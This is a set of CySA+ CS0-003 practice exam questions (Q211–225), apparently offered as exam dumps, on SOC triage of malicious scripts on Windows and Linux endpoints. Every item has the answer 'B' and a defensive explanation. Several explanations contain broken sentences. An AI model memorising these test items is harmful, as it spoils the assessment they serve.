CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 15 Q211-225

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 211

A SOC analyst observes Windows endpoints executing scripts that attempt to disable BitLocker encryption and modify group policies controlling disk access during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine system configuration; allow activity.
B) Malware attempting persistence, privilege escalation, and data exposure; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured BitLocker policies; update configuration.
D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes a routine system configuration. Legitimate system configuration changes are scheduled, documented, and performed using approved tools. Disabling BitLocker encryption and modifying group policies controlling disk access via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to access sensitive information, persist, escalate privileges, and potentially compromise the integrity and confidentiality of data stored on endpoints. Routine system configurations are predictable, auditable, and follow change management procedures, unlike unauthorized scripts executed during off-hours.

Option B is correct. Malware frequently targets encryption mechanisms and group policies to escalate privileges, maintain persistence, and potentially exfiltrate sensitive data. Indicators include off-hours activity, elevated privileges, execution by unsigned scripts, and unauthorized modifications to critical system configurations like BitLocker and Group Policy Objects. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine the behavior and objectives of the malware. Remediation includes restoring BitLocker policies, re-encrypting affected volumes, reverting group policy modifications, cleaning endpoints, updating monitoring rules, and auditing similar systems for comparable activity. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence by providing insights into attack techniques, tactics, and procedures. Ignoring this activity allows malware to persist undetected, escalate privileges, expose sensitive data, and potentially move laterally across the network.

Option C assumes misconfigured BitLocker policies. Misconfigurations typically cause predictable errors, prevent disk access for specific users, or generate alerts within security monitoring systems, and they do not explain off-hours execution of unsigned scripts to disable encryption and modify group policies. Treating this as a benign risk, persistent malware activity, unauthorized access, and potential data breaches.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts disabling encryption and modifying group policies are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, data exposure, and endpoint compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, data confidentiality, system integrity, and regulatory compliance. It also prevents further lateral movement and potential exfiltration of sensitive information.

Question 212

A SOC analyst detects Linux endpoints executing scripts that attempt to modify PAM (Pluggable Authentication Module) configurations and create unauthorized sudo entries during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine authentication configuration; allow activity.
B) Malware attempting privilege escalation and persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured PAM policies; update configuration.
D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes a routine authentication configuration. Legitimate changes to authentication modules are scheduled, documented, and follow strict change management procedures. Modifying PAM configurations and creating unauthorized sudo entries via undocumented scripts during off-hours indicates anomalous behavior. Allowing this could enable malware to escalate privileges, persist undetected, and compromise system security and sensitive resources. Routine authentication modifications are auditable, predictable, and require authorization, unlike unauthorized off-hours activity.

Option B is correct. Malware often targets authentication mechanisms, including PAM configurations, to escalate privileges and maintain persistence. Indicators include off-hours activity, elevated privileges, execution by undocumented scripts, and unauthorized modifications to authentication modules. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior, including the creation of hidden user accounts or backdoor access. Remediation includes restoring PAM configurations from trusted backups, removing unauthorized sudo entries, cleaning endpoints, updating monitoring rules to detect anomalous authentication modifications, and auditing similar systems for comparable changes. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, escalate privileges, maintain hidden access, and potentially compromise sensitive data.

Option C assumes misconfigured PAM policies. Misconfigurations typically produce predictable errors, failed authentications, or logs of policy violations, and they do not explain off-hours undocumented script execution, creating unauthorized sudo entries. Treating this as a benign risk, persistent malware activity, privilege escalation, and unauthorized access.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying authentication modules and creating unauthorized sudo entries are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, and endpoint compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, authentication integrity, and regulatory compliance. It also prevents potential lateral movement and unauthorized access to critical resources.

Question 213

A SOC analyst observes Windows endpoints executing scripts that attempt to exfiltrate encrypted database backups and SQL Server configuration files to external servers during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine backup; allow activity.
B) Malware performing data exfiltration; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured database backup policies; update configuration.
D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine backups. Legitimate backups are scheduled, documented, and use approved tools targeting authorized destinations. Exfiltration of encrypted database backups and SQL Server configuration files off-hours via unsigned scripts indicates anomalous activity. Allowing this could enable malware to access critical information, escalate privileges, and persist undetected. Routine backups are predictable, auditable, and typically involve authorized storage locations, unlike off-hours activity targeting unknown external servers.

Option B is correct. Malware frequently targets database backups and configuration files to gain unauthorized access to sensitive information, create backdoors, or facilitate lateral movement. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and attempts to transfer data to unknown external destinations. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic for forensic analysis, and analyzing scripts to determine what data may have been compromised. Remediation includes cleaning endpoints, blocking malicious IP addresses, resetting compromised credentials, updating monitoring rules for unauthorized data exports, and auditing backup policies and storage locations. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows persistent malware to compromise sensitive data, enable unauthorized access, and create a potential point of failure for database security.

Option C assumes misconfigured database backup policies. Misconfigurations usually cause predictable failures or alerts, but do not explain off-hours execution of unsigned scripts transferring critical data externally. Treating this as a benign risk, persistent malware activity, unauthorized access, and data exfiltration.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts exfiltrating database files are inconsistent with legitimate testing. Misclassification risks persistent malware activity, data exfiltration, and regulatory violations.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining database integrity, data confidentiality, and endpoint security. It also mitigates the risk of future attacks leveraging stolen backups or credentials.

Question 214

A SOC analyst detects Linux endpoints executing scripts attempting to modify system logging configurations and disable audit mechanisms during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine system maintenance; allow activity.
B) Malware attempting persistence and evasion; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured logging policies; update configuration.
D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes routine system maintenance. Legitimate maintenance activities are scheduled, documented, and performed using approved tools. Modifying logging configurations and disabling audit mechanisms via undocumented scripts during off-hours indicates anomalous activity. Allowing this could enable malware to persist undetected, evade monitoring, and compromise system security and sensitive resources. Routine maintenance is auditable and predictable, unlike unauthorized off-hours activity.

Option B is correct. Malware frequently targets logging and auditing mechanisms to evade detection and maintain persistence. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unauthorized modifications to system audit configurations. Immediate SOC response involves isolating affected endpoints to prevent further evasion, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and potential impacts. Remediation includes restoring logging configurations, re-enabling audit mechanisms, cleaning endpoints, updating monitoring rules to detect unauthorized changes, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, remain undetected, manipulate logs, and compromise sensitive systems.

Option C assumes misconfigured logging policies. Misconfigurations generally produce predictable errors, failed logs, or alerts, and do not explain off-hours undocumented script execution. Treating this as a benign risk, persistent malware activity, evasion, and endpoint compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying logging configurations are inconsistent with legitimate testing. Misclassification risks persistent malware activity, audit evasion, and system compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, system integrity, and regulatory compliance. It also prevents further undetected malicious activity across the network.

Question 215

A SOC analyst observes Windows endpoints executing scripts attempting to create unauthorized administrative accounts and modify Active Directory permissions during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine administrative changes; allow activity.
B) Malware attempting privilege escalation and persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured Active Directory permissions; update configuration.
D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine administrative changes. Legitimate administrative modifications are scheduled, documented, and performed using approved tools. Creating unauthorized admin accounts and modifying Active Directory permissions via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to escalate privileges, persist, and compromise domain-level resources. Routine administrative changes are predictable, auditable, and follow strict change management procedures, unlike unauthorized off-hours activity.

Option B is correct. Malware often creates unauthorized administrative accounts and modifies directory permissions to escalate privileges, maintain persistence, and control domain resources. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and unauthorized Active Directory modifications. Immediate SOC response involves isolating affected endpoints, capturing memory and logs for forensic analysis, and analyzing scripts to identify malware behavior and the scope of compromise. Remediation includes removing unauthorized accounts, restoring directory permissions, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows persistent malware to escalate privileges, maintain undetected access, and compromise sensitive directory services.

Option C assumes misconfigured Active Directory permissions. Misconfigurations generally produce predictable errors or limited access issues and do not explain off-hours, unsigned scripts modifying permissions. Treating this as a benign risk, persistent malware activity, privilege escalation, and domain compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts creating admin accounts are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, and domain compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining Active Directory security, endpoint integrity, and regulatory compliance. It also prevents potential lateral movement and compromise of critical systems.

Question 216

A SOC analyst detects Linux endpoints executing scripts attempting to modify firewall rules and open unusual ports during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine network configuration; allow activity.
B) Malware attempting persistence and lateral movement; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured firewall rules; update configuration.
D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes a routine network configuration. Legitimate network changes are scheduled, documented, and use approved tools. Modifying firewall rules and opening unusual ports via undocumented scripts during off-hours indicates anomalous activity. Allowing this could enable malware to move laterally, evade detection, and persist undetected. Routine network changes are auditable, predictable, and follow strict change management procedures, unlike unauthorized off-hours scripts.

Option B is correct. Malware frequently modifies firewall rules to allow external access, exfiltrate data, or facilitate lateral movement within a network. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unusual port activity. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior. Remediation includes restoring firewall rules from trusted configurations, closing unauthorized ports, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, evade detection, expand its foothold, and potentially compromise sensitive data or critical systems.

Option C assumes misconfigured firewall rules. Misconfigurations typically produce predictable access issues or alerts, and do not explain off-hours undocumented script execution opening unusual ports. Treating this as a benign risk, persistent malware activity, lateral movement, and data compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts modifying firewall rules are inconsistent with legitimate testing. Misclassification risks persistent malware activity, evasion, lateral movement, and endpoint compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, network integrity, and regulatory compliance.

Question 217

A SOC analyst observes Windows endpoints executing scripts attempting to disable Windows Event Logging and clear security logs during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine system maintenance; allow activity.
B) Malware attempting persistence and evasion; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured logging policies; update configuration.
D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine system maintenance. Legitimate maintenance activities are scheduled, documented, and performed using approved tools. Disabling Windows Event Logging and clearing security logs via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to evade detection, persist undetected, and compromise system integrity and security monitoring. Routine maintenance is predictable, auditable, and follows strict change management procedures, unlike off-hours unauthorized script execution.

Option B is correct. Malware frequently targets security logs to avoid detection and maintain persistence. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and unauthorized modifications to logging configurations. Immediate SOC response involves isolating affected endpoints to prevent further evasion, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and the scope of compromised logs. Remediation includes restoring logging configurations, cleaning endpoints, updating monitoring rules to detect unauthorized log modifications, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, evade detection, manipulate logs, and compromise system security.

Option C assumes misconfigured logging policies. Misconfigurations typically produce predictable failures, error alerts, or prevent certain events from being logged, and they do not explain off-hours undocumented script execution clearing logs. Treating this as a benign risk, persistent malware activity, evasion, and endpoint compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts clearing security logs are inconsistent with legitimate testing. Misclassification risks persistent malware activity, evasion, and endpoint compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, monitoring integrity, and regulatory compliance.

Question 218

A SOC analyst detects Linux endpoints executing scripts attempting to exfiltrate system credentials, SSH keys, and configuration files to external servers during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine file backup; allow activity.
B) Malware performing credential theft and data exfiltration; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured backup policies; update configuration.
D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes routine file backup. Legitimate backups are scheduled, documented, and use approved tools and destinations. Exfiltration of system credentials, SSH keys, and configuration files off-hours via undocumented scripts indicates anomalous activity. Allowing this could enable malware to compromise credentials, escalate privileges, persist undetected, and exfiltrate sensitive data. Routine backups are predictable, auditable, and involve authorized storage locations, unlike unauthorized off-hours activity.

Option B is correct. Malware frequently targets credentials and configuration files to gain unauthorized access, escalate privileges, and maintain persistence. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and attempts to communicate with external servers. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic for forensic analysis, and analyzing scripts to determine what data has been accessed or exfiltrated. Remediation includes cleaning endpoints, resetting compromised credentials, blocking malicious IP addresses, updating monitoring rules, and auditing sensitive directories. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, compromise authentication mechanisms, exfiltrate sensitive data, and move laterally across the network.

Option C assumes misconfigured backup policies. Misconfigurations typically cause predictable failures or alerts and do not explain off-hours unauthorized exfiltration of credentials. Treating this as a benign risk, persistent malware activity, unauthorized access, and data loss.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts exporting credentials and configuration files are inconsistent with legitimate testing. Misclassification risks persistent malware activity, credential theft, and regulatory violations.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, credential integrity, and data confidentiality.

Question 219

A SOC analyst observes Windows endpoints executing scripts attempting to modify registry autorun keys, disable antivirus software, and create scheduled tasks during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine administrative changes; allow activity.
B) Malware attempting persistence and evasion; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured system policies; update configuration.
D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine administrative changes. Legitimate administrative modifications are scheduled, documented, and performed using approved tools. Modifying registry autorun keys, disabling antivirus software, and creating scheduled tasks via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to persist, evade detection, and compromise endpoints. Routine administrative changes are predictable, auditable, and follow change management procedures, unlike unauthorized scripts.

Option B is correct. Malware frequently modifies autorun keys, disables antivirus software, and creates scheduled tasks to maintain persistence and evade detection. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and unauthorized modifications to critical system configurations. Immediate SOC response involves isolating affected endpoints, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and intended modifications. Remediation includes restoring antivirus and autorun configurations, removing unauthorized scheduled tasks, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, evade detection, escalate privileges, and compromise endpoint security.

Option C assumes misconfigured system policies. Misconfigurations generally produce predictable errors or alerts and do not explain off-hours execution of unsigned scripts performing multiple malicious activities. Treating this as a benign risk, persistent malware activity, evasion, and endpoint compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying the registry and disabling security software are inconsistent with legitimate testing. Misclassification risks persistent malware activity, evasion, and endpoint compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, system integrity, and regulatory compliance.

Question 220

A SOC analyst detects Linux endpoints executing scripts attempting to install keyloggers, capture SSH credentials, and modify cron jobs for persistence during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine system updates; allow activity.
B) Malware attempting persistence, credential theft, and privilege escalation; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured cron jobs; update configuration.
D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes routine system updates. Legitimate updates are scheduled, documented, and use verified packages. Installing keyloggers, capturing SSH credentials, and modifying cron jobs via undocumented scripts during off-hours indicates anomalous activity. Allowing this could enable malware to persist, capture sensitive information, escalate privileges, and compromise endpoints. Routine updates are predictable, auditable, and follow change management procedures, unlike unauthorized off-hours activity.

Option B is correct. Malware frequently installs keyloggers, captures credentials, and modifies cron jobs to maintain persistence, escalate privileges, and collect sensitive data. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unauthorized modifications to system configurations and scheduled tasks. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and the scope of compromise. Remediation includes removing keyloggers, restoring cron jobs, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, steal credentials, escalate privileges, and compromise sensitive systems.

Option C assumes misconfigured cron jobs. Misconfigurations typically produce predictable errors or missed job execution and do not explain off-hours undocumented scripts installing keyloggers or capturing credentials. Treating this as a benign persistent malware activity, credential theft, and endpoint compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts installing keyloggers are inconsistent with legitimate testing. Misclassification risks persistent malware activity, credential theft, and endpoint compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, data confidentiality, and system integrity.

Question 221

A SOC analyst observes Windows endpoints executing scripts attempting to exfiltrate corporate financial spreadsheets and ERP configuration files to unknown external servers during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine financial backups allow activity.
B) Malware performing data exfiltration; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured ERP backup policies; update configuration.
D) User testing; notify the finance team.

Answer: B)

Explanation:

Option A assumes routine financial backups. Legitimate financial backups are scheduled, documented, and executed using approved tools, targeting authorized storage locations. Exfiltration of spreadsheets and ERP configuration files off-hours via unsigned scripts indicates anomalous activity. Allowing this could enable malware to access sensitive financial data, persist undetected, escalate privileges, and potentially compromise enterprise operations. Routine backups are predictable, auditable, and performed under strict compliance policies, unlike unauthorized off-hours scripts targeting unknown external servers.

Option B is correct. Malware frequently targets financial information and ERP configurations to steal sensitive corporate data for financial gain or espionage. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and attempts to communicate with unknown external servers. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic for forensic analysis, and analyzing scripts to determine the scope of compromised data. Remediation includes cleaning endpoints, blocking malicious external destinations, resetting credentials, updating monitoring rules for data exfiltration, and auditing ERP systems for signs of compromise. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence by identifying tactics, techniques, and procedures used by attackers. Ignoring this activity allows malware to persist, compromise sensitive financial data, facilitate fraud or espionage, and potentially evade detection across multiple systems.

Option C assumes misconfigured ERP backup policies. Misconfigurations usually cause predictable errors or failed backup alerts, but do not explain off-hours execution of unsigned scripts exporting sensitive files to unknown destinations. Treating this as a benign risk, persistent malware activity, unauthorized access, and financial data loss.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours unauthorized script execution, exporting financial data, is inconsistent with legitimate testing. Misclassification risks persistent malware activity, data exfiltration, regulatory violations, and financial exposure.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, financial data confidentiality, and regulatory compliance.

Question 222

A SOC analyst detects Linux endpoints executing scripts attempting to modify sudoers files, create hidden administrative accounts, and escalate privileges during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine administrative updates; allow activity.
B) Malware attempting privilege escalation and persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured sudo policies; update configuration.
D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes routine administrative updates. Legitimate administrative changes are scheduled, documented, and performed using approved tools. Modifying sudoers files, creating hidden accounts, and escalating privileges via undocumented scripts during off-hours indicates anomalous behavior. Allowing this could enable malware to persist undetected, gain unauthorized root-level access, and compromise sensitive systems. Routine administrative updates are predictable, auditable, and follow change management procedures, unlike unauthorized off-hours scripts.

Option B is correct. Malware frequently targets sudoers files and account creation mechanisms to escalate privileges and maintain persistent access. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unauthorized changes to critical administrative configurations. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior. Remediation includes restoring sudoers files from trusted backups, removing hidden administrative accounts, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, escalate privileges, maintain root-level access, and potentially compromise sensitive systems or data.

Option C assumes misconfigured sudo policies. Misconfigurations typically produce predictable errors or failed commands and do not explain off-hours undocumented script execution, creating hidden accounts. Treating this as a benign risk, persistent malware activity, privilege escalation, and system compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying sudoers files and creating hidden accounts are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, and endpoint compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, system integrity, and regulatory compliance.

Question 223

A SOC analyst observes Windows endpoints executing scripts attempting to disable credential caching, modify Kerberos policies, and exfiltrate authentication tokens during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine system optimization; allow activity.
B) Malware performing credential theft and privilege escalation; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured Kerberos policies; update configuration.
D) User testing; notify IT.

Answer: B)

Explanation:

Option A assumes routine system optimization. Legitimate optimizations are scheduled, documented, and performed using approved tools. Disabling credential caching, modifying Kerberos policies, and exfiltrating authentication tokens via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to steal credentials, escalate privileges, and persist undetected across domain environments. Routine optimizations are predictable, auditable, and follow strict change management procedures, unlike unauthorized scripts.

Option B is correct. Malware frequently targets authentication mechanisms to gain unauthorized access, exfiltrate credentials, and escalate privileges. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and unauthorized modifications to Kerberos or credential storage configurations. Immediate SOC response involves isolating affected endpoints to prevent further credential theft, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and scope of compromise. Remediation includes restoring Kerberos policies, resetting compromised credentials, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, steal authentication tokens, escalate privileges, and compromise sensitive domain resources.

Option C assumes misconfigured Kerberos policies. Misconfigurations generally produce predictable authentication errors and do not explain off-hours execution of unsigned scripts, exfiltrating credentials. Treating this as a benign risk, persistent malware activity, credential theft, and domain compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts exfiltrating authentication tokens are inconsistent with legitimate testing. Misclassification risks persistent malware activity, credential theft, and regulatory violations.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, authentication integrity, and regulatory compliance.

Question 224

A SOC analyst detects Linux endpoints executing scripts attempting to create unauthorized SSH keys, modify login configurations, and schedule cron jobs for persistence during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine SSH configuration; allow activity.
B) Malware attempting persistence, unauthorized access, and privilege escalation; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured SSH policies; update configuration.
D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes a routine SSH configuration. Legitimate SSH changes are scheduled, documented, and performed using approved tools. Creating unauthorized SSH keys, modifying login configurations, and scheduling cron jobs via undocumented scripts during off-hours indicates anomalous activity. Allowing this could enable malware to persist, gain unauthorized access, escalate privileges, and compromise sensitive systems. Routine SSH configuration is predictable, auditable, and follows change management procedures, unlike unauthorized scripts.

Option B is correct. Malware often targets SSH keys and login mechanisms to maintain persistent access, escalate privileges, and enable remote control. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unauthorized modifications to SSH configurations and cron jobs. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior. Remediation includes removing unauthorized SSH keys, restoring login configurations, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, escalate privileges, maintain unauthorized access, and compromise sensitive systems.

Option C assumes misconfigured SSH policies. Misconfigurations generally cause predictable authentication failures or failed logins and do not explain off-hours undocumented script execution, creating keys and cron jobs. Treating this as a benign risk, persistent malware activity, unauthorized access, and system compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts modifying SSH configurations are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, and endpoint compromise.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, system integrity, and regulatory compliance.

Question 225

A SOC analyst observes Windows endpoints executing scripts attempting to exfiltrate source code repositories, API keys, and software build configurations to unknown external servers during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine code backup; allow activity.
B) Malware performing intellectual property theft and data exfiltration; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured backup policies; update configuration.
D) User testing; notify the development team.

Answer: B)

Explanation:

Option A assumes routine code backups. Legitimate backups are scheduled, documented, and executed using approved tools targeting authorized storage locations. Exfiltration of source code, API keys, and build configurations off-hours via unsigned scripts indicates anomalous activity. Allowing this could enable malware to steal intellectual property, persist undetected, escalate privileges, and compromise enterprise software integrity. Routine backups are predictable, auditable, and performed under compliance policies, unlike off-hours unauthorized activity targeting unknown destinations.

Option B is correct. Malware frequently targets intellectual property, such as source code repositories and API keys, to steal proprietary information, enable software supply chain attacks, or facilitate corporate espionage. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and communication with unknown external servers. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic for forensic analysis, and analyzing scripts to determine the scope of stolen data. Remediation includes cleaning endpoints, blocking malicious external servers, resetting compromised credentials, updating monitoring rules for sensitive data exports, and auditing source code repositories. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, compromise proprietary information, facilitate unauthorized access, and potentially damage enterprise operations.

Option C assumes that unusual off-hours activity, specifically the execution of unsigned scripts exporting sensitive source code, can be attributed to misconfigured backup policies. Backup policies in enterprise environments are critical for maintaining data integrity and ensuring business continuity. Misconfigurations in backup systems—such as incorrect scheduling, misapplied retention settings, or improperly configured backup paths—typically result in predictable and traceable outcomes. Common manifestations of backup misconfigurations include missed backups, failed backup jobs, alerts regarding inaccessible files or directories, or incomplete snapshots. These outcomes are generally limited in scope, affecting particular servers, directories, or datasets, and are easily identifiable through routine monitoring and logging mechanisms.

In contrast, the off-hours execution of unsigned scripts that export sensitive source code is inconsistent with the behavior expected from backup misconfigurations. Backup errors or misconfigurations do not autonomously execute scripts, perform data exports outside scheduled windows, or bypass existing security controls. Unsigned scripts indicate that the activity is not originating from authorized system processes or verified administrative tools. The deliberate nature of such scripts, combined with their off-hours execution, strongly suggests the presence of malicious actors attempting to extract intellectual property or establish a persistent foothold within the network. Treating such activity as benign under the assumption of backup misconfiguration introduces substantial risks, including the possibility of ongoing malware activity, theft of proprietary code, and broader system compromise.

Option D assumes that off-hours export of source code could be part of legitimate user testing. While testing is a necessary and routine part of enterprise operations, it is typically structured, scheduled, and well-documented. Approved testing processes involve known endpoints, validated scripts, and controlled environments. Testing is performed to validate system functionality, software behavior, or security controls, and generally does not involve unsupervised data exports or access to sensitive production repositories. Off-hours execution of undocumented scripts targeting source code is inconsistent with these principles, as legitimate testing would occur in line with approved schedules and established operational procedures. The lack of documentation, the timing of execution, and the focus on sensitive intellectual property indicate activity outside the bounds of legitimate testing.

